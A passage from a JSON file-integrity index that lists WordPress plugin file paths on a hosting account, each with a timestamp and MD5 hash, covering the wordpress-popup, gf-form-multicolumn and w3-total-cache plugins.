lib\\/Auth\\/AuthInterface.php\":{\"d\":1534138295,\"h\":\"94cdcd90cb0ab907ce3c62ac84d08deb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/mautic\\/api-library\\/lib\\/QueryBuilder\\/QueryBuilder.php\":{\"d\":1534138295,\"h\":\"52464e7ece57062485f9b9831d36bd85\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/mautic\\/api-library\\/lib\\/QueryBuilder\\/WhereBuilder.php\":{\"d\":1534138295,\"h\":\"042e88925ed317a69a111ba3680bc9be\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/mautic\\/api-library\\/lib\\/MauticApi.php\":{\"d\":1534138295,\"h\":\"3b5aa55d5ad349c99c5b1e5e691e1a34\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/mautic\\/api-library\\/composer.json\":{\"d\":1534138295,\"h\":\"0d39e79219189904abdb29b7dac6f027\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/mautic\\/api-library\\/phpunit.xml.dist\":{\"d\":1534138295,\"h\":\"e10ee97940ef5fd3d8df05dd3ec29da3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/mautic\\/api-library\\/LICENSE.md\":{\"d\":1534138295,\"h\":\"cf4edbefd775c1bf19fdeff2ddb6f38e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/mautic\\/api-library\\/README.md\":{\"d\":1534138295,\"h\":\"177539712a8bcdd2a978508eb9979b03\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/composer\\/installed.json\":{\"d\":1534138296,\"h\":\"0072f670f108e367c867ed5cb1ed5582\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/composer\\/ClassLoader52.php\":{\"d\":1534138296,\"h\":\"c8b909e2a65a5ecec42bc17d69f47f98\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/composer\\/autoload_static.php\":{\"d\":1534138296,\"h\":\"256462dc51c989ba21cba0d660a6e772\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/composer\\/autoload_classmap.php\":{\"d\":1534138296,\"h\":\"ec7cd4881dd4e1e3a8ebc9f46e855cca\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/composer\\/autoload_real.php\":{\"d\":1534138296,\"h\":\"429c613b026d4b48162ec330638a832e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/composer\\/ClassLoader.php\":{\"d\":1534138296,\"h\":\"292c079dbe63ba06bfbf37fd99fe4bf9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/composer\\/autoload_real_52.php\":{\"d\":1534138296,\"h\":\"fbd19abc1f8058682200d7b51945b9dd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/composer\\/autoload_psr4.php\":{\"d\":1534138296,\"h\":\"01d7216b1df0aefe205c2f45179d3701\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/composer\\/autoload_namespaces.php\":{\"d\":1534138296,\"h\":\"35e12c7d76c4a81633bcf547c0e229a9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/composer\\/LICENSE\":{\"d\":1534138296,\"h\":\"955d5fe58c231244f6b49000f383b5e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/autoload.php\":{\"d\":1534138295,\"h\":\"b313e136fb9c45292dbbee0960618952\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/vendor\\/autoload_52.php\":{\"d\":1534138296,\"h\":\"2345d5059641c5092eec9e62a9642223\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/tests\\/ui\\/popup.html\":{\"d\":1534138295,\"h\":\"5cb9918e96b1c6a6f2e691fd6b044e2f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/tests\\/php\\/bootstrap.php\":{\"d\":1534138295,\"h\":\"c89121ae0634d079962fdc976dbacf98\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/tests\\/php\\/phpunit.xml\":{\"d\":1534138295,\"h\":\"96273e1192cc1cbcf3af8f45f61fdca0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/view\\/pointer.php\":{\"d\":1534138295,\"h\":\"2d273aaa67d29da3880297253130bc5f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/view\\/list.php\":{\"d\":1534138295,\"h\":\"be2177b696ee56eacf7a870570583b4a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/js\\/vendor\\/select2\\/select2.js\":{\"d\":1534138295,\"h\":\"9e0f9127543e77f92b5cb702a28be114\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/js\\/src\\/wpmu-ajaxdata.js\":{\"d\":1534138295,\"h\":\"b1d6bc88ca2dc0f7840f095166f496e5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/js\\/src\\/wpmu-ui-hooks.js\":{\"d\":1534138295,\"h\":\"ef13e519def230be0291f2efaafc292e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/js\\/src\\/wpmu-ui.js\":{\"d\":1534138295,\"h\":\"b8ba7c4b5446c5750e654c2f25a93f24\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/js\\/src\\/wpmu-card-list.js\":{\"d\":1534138295,\"h\":\"ec3506a65c447d6ef0d21072815968e7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/js\\/src\\/wpmu-ui-progress.js\":{\"d\":1534138295,\"h\":\"27932c98adb98b0d5b30ba9910e7a309\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/js\\/src\\/wpmu-ui-window.js\":{\"d\":1534138295,\"h\":\"317b3619fd15d63816f2e5bffee0efb8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/js\\/src\\/wpmu-binary.js\":{\"d\":1534138295,\"h\":\"50c82bd6c9612c16135adcedabc44de4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/js\\/src\\/wpmu-vnav.js\":{\"d\":1534138295,\"h\":\"b7092bf1968908d731f839e01f79a06a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/js\\/select2.3.min.js\":{\"d\":1534138295,\"h\":\"ba4d8efad248fd4decbef6d391a3b3f3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/js\\/wpmu-ui.3.min.js\":{\"d\":1534138295,\"h\":\"368f18cd55f93fa009290df47a5eb58f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/js\\/wpmu-ui.3.js\":{\"d\":1534138295,\"h\":\"0991f7516053a9dfc4a7d446d62744c1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/js\\/wpmu-card-list.3.js\":{\"d\":1534138295,\"h\":\"61cc9bbdc7d6d52feb48f321a581451e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/js\\/wpmu-card-list.3.min.js\":{\"d\":1534138295,\"h\":\"22af3aa2119e8959f5b9f4e48cc8899c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/js\\/select2.3.js\":{\"d\":1534138295,\"h\":\"d489358484af7255a4a74a3e63f9f1b3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/js\\/wpmu-vnav.3.min.js\":{\"d\":1534138295,\"h\":\"0283ee41f30bea0d9615474fbf035014\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/js\\/wpmu-vnav.3.js\":{\"d\":1534138295,\"h\":\"c42e21b3cc348846f2145756a8de1f09\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/fonts\\/fontawesome440-webfont.eot\":{\"d\":1534138295,\"h\":\"45c73723862c6fc5eb3d6961db2d71fb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/fonts\\/fontawesome440-webfont.woff\":{\"d\":1534138295,\"h\":\"dfb02f8f6d0cedc009ee5887cc68f1f3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/fonts\\/fontawesome440-webfont.ttf\":{\"d\":1534138295,\"h\":\"7c87870ab40d63cfb8870c1f183f9939\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/fonts\\/FontAwesome440.otf\":{\"d\":1534138295,\"h\":\"668743fe7258676f8ef8f9b47d2a623e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/fonts\\/fontawesome440-webfont.woff2\":{\"d\":1534138295,\"h\":\"4b5a84aaf1c9485e060c503a0ff8cadb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/inc\\/class-thelib-html.php\":{\"d\":1534138295,\"h\":\"e713af0b1790a540203d7d99356401f7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/inc\\/class-thelib-updates.php\":{\"d\":1534138295,\"h\":\"ff01f70c8d2a4cdda3e10e8ceb9f4b0a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/inc\\/class-thelib-debug.php\":{\"d\":1534138295,\"h\":\"dfc0219dfaf48f2429dc971eb850d90e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/inc\\/class-thelib-net.php\":{\"d\":1534138295,\"h\":\"ffa9fe37ee8601ea929466a575d9bffa\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/inc\\/class-thelib-core.php\":{\"d\":1534138295,\"h\":\"d509a74d0d95a4fdae2a6ed5208a72ed\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/inc\\/class-thelib-ui.php\":{\"d\":1534138295,\"h\":\"6aa08ab94e2dbe6cc1f934f90967dc05\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/inc\\/class-thelib-session.php\":{\"d\":1534138295,\"h\":\"1366ca6a77a340b33a766b8e03cee969\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/inc\\/class-thelib-array.php\":{\"d\":1534138295,\"h\":\"9afd7936b7994966e74f4ad101975749\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/inc\\/class-thelib.php\":{\"d\":1534138295,\"h\":\"714b5733a6d5ba36fa23ad6ac2b1ebec\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/sass\\/select2\\/select2.scss\":{\"d\":1534138295,\"h\":\"44147b1cdfc1d046e00c1c8dba376c86\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/sass\\/jquery-ui\\/jquery-ui-1.11.4.custom.scss\":{\"d\":1534138295,\"h\":\"ec1a6674e85d039375e757ac48aa5d50\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/sass\\/animate-css\\/animate.scss\":{\"d\":1534138295,\"h\":\"15d0f0b46fe1b35d0e3a88c5de846d60\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/sass\\/font-awesome\\/_animated.scss\":{\"d\":1534138295,\"h\":\"39ff4f359a7b81d6585075715f41e5dc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/sass\\/font-awesome\\/_variables.scss\":{\"d\":1534138295,\"h\":\"71486c390a02bcdefc32b18e0c2de42d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/sass\\/font-awesome\\/_stacked.scss\":{\"d\":1534138295,\"h\":\"5594237226aedfbca2fa1c7f4604c214\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/sass\\/font-awesome\\/_icons.scss\":{\"d\":1534138295,\"h\":\"bf191ec4814fc5a8f3039782acebf31c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/sass\\/font-awesome\\/_larger.scss\":{\"d\":1534138295,\"h\":\"e95931566f6fc6ad5685c4fa9802e206\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/sass\\/font-awesome\\/_fixed-width.scss\":{\"d\":1534138295,\"h\":\"9277ab6964a434d499873687b00be906\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/sass\\/font-awesome\\/font-awesome.scss\":{\"d\":1534138295,\"h\":\"eb53456497f4aafc8488599d27e4b254\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/sass\\/font-awesome\\/_path.scss\":{\"d\":1534138295,\"h\":\"0ffe1fa4ebc078fd4537780551ad4c5e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/sass\\/font-awesome\\/_bordered-pulled.scss\":{\"d\":1534138295,\"h\":\"4cad0df17bf40327feae33fa9a6c6ba2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/sass\\/font-awesome\\/_rotated-flipped.scss\":{\"d\":1534138295,\"h\":\"9f5d4bc6fadea89328d2aac26574a9d8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/sass\\/font-awesome\\/_mixins.scss\":{\"d\":1534138295,\"h\":\"bc0b350469a7e2807ef2c5c48dfc5343\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/sass\\/font-awesome\\/_spinning.scss\":{\"d\":1534138295,\"h\":\"7dcbea35ea3ee2f576354daeb510ab33\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/sass\\/font-awesome\\/_core.scss\":{\"d\":1534138295,\"h\":\"2727ce84fd80801e5680e2fb0a3aed67\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/sass\\/font-awesome\\/_list.scss\":{\"d\":1534138295,\"h\":\"7107e80b053928271d5fcf422dc29490\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/sass\\/wpmu-vnav.scss\":{\"d\":1534138295,\"h\":\"2b7ece32536186f6d49c2330725ec877\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/sass\\/wpmu-card-list.scss\":{\"d\":1534138295,\"h\":\"2f6e1b2f9f955c9a664d55aa029bd243\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/sass\\/wpmu-ui.scss\":{\"d\":1534138295,\"h\":\"3a10ceec1452ab070c2c314d645b790c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/sass\\/wpmu-html.scss\":{\"d\":1534138295,\"h\":\"19216226d52c696b3093a699401be87c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/jquery-ui.wpmui.3.min.css\":{\"d\":1534138295,\"h\":\"1a17ce4705f862d5a6a4dc046e48ff91\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/wpmu-html.3.css\":{\"d\":1534138295,\"h\":\"d21c0946510657c893eae0154a33d6bc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/select2.3.css\":{\"d\":1534138295,\"h\":\"68ffeace934b2d5e544eb646f110a494\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/wpmu-card-list.3.min.css\":{\"d\":1534138295,\"h\":\"dfa5c9b5552ae4015edacdab5e7b3429\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/animate.3.css\":{\"d\":1534138295,\"h\":\"29a75367d178fca15170b08ff795809a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/wpmu-vnav.3.css\":{\"d\":1534138295,\"h\":\"a491cfd1dcb0857f1a6279020a319e20\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/select2.3.min.css\":{\"d\":1534138295,\"h\":\"b02abebb0531d6a266b298b1a6d697b3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/wpmu-html.3.min.css\":{\"d\":1534138295,\"h\":\"88478e1a9d9ff5d955d7892d24fad350\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/wpmu-card-list.3.css\":{\"d\":1534138295,\"h\":\"8f0b8ffb1ab736af40827e0959d5a56b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/jquery-ui.wpmui.3.css\":{\"d\":1534138295,\"h\":\"d0aedd0dba0e905c4c04aa90ad29db4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/wpmu-vnav.3.min.css\":{\"d\":1534138295,\"h\":\"569b2f2a303e0277297ec9f47fba1167\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/wpmu-ui.3.css\":{\"d\":1534138295,\"h\":\"21efad91322b64852d8c05b528346669\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/fontawesome.3.min.css\":{\"d\":1534138295,\"h\":\"9dfe30093b8d4afc2fc0d5642674d3c0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/animate.3.min.css\":{\"d\":1534138295,\"h\":\"c728ae1f609c52b4c87cd92f8b1406c4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/wpmu-ui.3.min.css\":{\"d\":1534138295,\"h\":\"eec25109efaa25c39ca197c96439ebf6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/css\\/fontawesome.3.css\":{\"d\":1534138295,\"h\":\"072aadc3d361c836b87f97b7a0da2605\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/package.json\":{\"d\":1534138295,\"h\":\"384009b9c71e01f90d6fe49793385cb7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/changelog.txt\":{\"d\":1534138295,\"h\":\"55627ac9e2672142927515b7cdab92b8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/license.txt\":{\"d\":1534138295,\"h\":\"9b424f49a13af80f0d50354f54916f00\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/core.php\":{\"d\":1534138295,\"h\":\"05741d0870f55f50b63363b77d00e166\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/wpmu-lib\\/Gruntfile.js\":{\"d\":1534138295,\"h\":\"7d1685f18b5f081f29353dfb483ee467\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/free-dashboard\\/module.php\":{\"d\":1534138295,\"h\":\"34c2336cc4faa18b70d565f9b4c53aaf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/free-dashboard\\/admin.js\":{\"d\":1534138295,\"h\":\"e7cfa3bac9e28edd4a800e870a3592b6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/lib\\/free-dashboard\\/admin.css\":{\"d\":1534138295,\"h\":\"c3acd6454d5eb78b81fca7fb19c80d78\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/readme.txt\":{\"d\":1534138295,\"h\":\"492aab906149221cffc4cb755345adbf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/humans.txt\":{\"d\":1534138296,\"h\":\"1f0ae677a7b6a4ba58b34826ddf22064\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/popover.php\":{\"d\":1534138296,\"h\":\"da82ead5e82756b696bfae2ef14c2542\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/changelog.txt\":{\"d\":1534138295,\"h\":\"40a33cf77efe815c2527b526295fce0c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/license.txt\":{\"d\":1534138295,\"h\":\"d2757351a01cf44ef5938080d599708f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/package-lock.json\":{\"d\":1534138296,\"h\":\"d24ea2f8ebb5313cff518086774ebefb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/wordpress-popup\\/opt-in-static.php\":{\"d\":1534138295,\"h\":\"307dd6f2ebfc7e88acf995ace1c29851\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/gf-form-multicolumn\\/css\\/gf-form-multicolumn.css\":{\"d\":1484578444,\"h\":\"089a7b8cc1b670f8d52acb2a7374c060\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/gf-form-multicolumn\\/readme.txt\":{\"d\":1484578444,\"h\":\"88105bcdd4fe19c93ba9e8c3ae415121\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/gf-form-multicolumn\\/gf-form-multicolumn.php\":{\"d\":1484578444,\"h\":\"4c349850ec31602f2b171aee00d769cb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/gf-form-multicolumn\\/LICENSE\":{\"d\":1484578444,\"h\":\"84dcc94da3adb52b53ae4fa38fe49e5d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/wp-content\\/advanced-cache.php\":{\"d\":1526741202,\"h\":\"13fae91ceacd450584e43d1d9f7286d8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/wp-content\\/db.php\":{\"d\":1526741202,\"h\":\"ea5ed9522607dccf1214f8fcaa09ba7e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/wp-content\\/index.html\":{\"d\":1526741202,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/wp-content\\/object-cache.php\":{\"d\":1526741202,\"h\":\"4283fe54666a7131ad3e072acf36c572\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/extension-example\\/w3-total-cache-example.php\":{\"d\":1526741203,\"h\":\"605f32854a35821c89c498a2954800cc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/extension-example\\/Extension_Example_Page_View.php\":{\"d\":1526741203,\"h\":\"b5c64325a28266dffdf14b76a155a336\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/extension-example\\/Extension_Example.php\":{\"d\":1526741203,\"h\":\"dc46137bfda5c8db01403137b66176ac\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/extension-example\\/Extension_Example_Admin.php\":{\"d\":1526741203,\"h\":\"afd7e86b514ab6ee16ef115bbddc65aa\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/inc\\/email\\/index.html\":{\"d\":1526741203,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/inc\\/email\\/support_request.php\":{\"d\":1526741203,\"h\":\"d00db396a565f2a27a9a343833b3574b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/inc\\/email\\/minify_error_notification.html\":{\"d\":1526741203,\"h\":\"7b64d948b142dd10d1bf501dc135bd1d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/inc\\/email\\/minify_error_notification.php\":{\"d\":1526741203,\"h\":\"7b64d948b142dd10d1bf501dc135bd1d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/inc\\/options\\/cdn\\/common\\/cnames-readonly.php\":{\"d\":1526741203,\"h\":\"61716067d21c277dfbde760dcaafd513\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/inc\\/options\\/cdn\\/common\\/index.html\":{\"d\":1526741203,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/w3-total-cache\\/inc\\/options\\/cdn\\/common\\/cnames.php\":{\"d\":1526741203,\"h\":\"6c17ae60e157b9689bad2861aba2b8d1\"},\"\\/home2\\/zphiblgz\\/public_html\\